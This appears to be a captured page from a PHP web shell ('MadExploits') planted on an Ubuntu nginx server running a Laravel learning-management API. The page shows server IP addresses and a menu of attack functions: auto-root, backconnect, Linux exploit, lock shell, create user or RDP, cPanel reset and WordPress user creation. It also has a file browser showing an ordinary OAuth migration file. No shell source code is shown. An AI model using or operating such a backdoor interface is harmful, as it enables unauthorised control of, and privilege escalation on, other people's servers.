Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api /
database /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
2014_10_12_100000_create_passw...
683
B
-rw-rw-r--
2016_06_01_000001_create_oauth...
829
B
-rw-rw-r--
2016_06_01_000002_create_oauth...
941
B
-rw-rw-r--
2016_06_01_000003_create_oauth...
764
B
-rw-rw-r--
2016_06_01_000004_create_oauth...
930
B
-rw-rw-r--
2016_06_01_000005_create_oauth...
714
B
-rw-rw-r--
2018_10_16_035808_create_permi...
3.32
KB
-rw-rw-r--
2019_06_26_070608_create_jobs_...
860
B
-rw-rw-r--
2019_06_26_080747_create_faile...
789
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2016_06_01_000004_create_oauth_clients_table.php
<?php use Illuminate\Support\Facades\Schema; use Illuminate\Database\Schema\Blueprint; use Illuminate\Database\Migrations\Migration; class CreateOauthClientsTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('oauth_clients', function (Blueprint $table) { $table->increments('id'); $table->integer('user_id')->index()->nullable(); $table->string('name'); $table->string('secret', 100); $table->text('redirect'); $table->boolean('personal_access_client'); $table->boolean('password_client'); $table->boolean('revoked'); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('oauth_clients'); } }
Close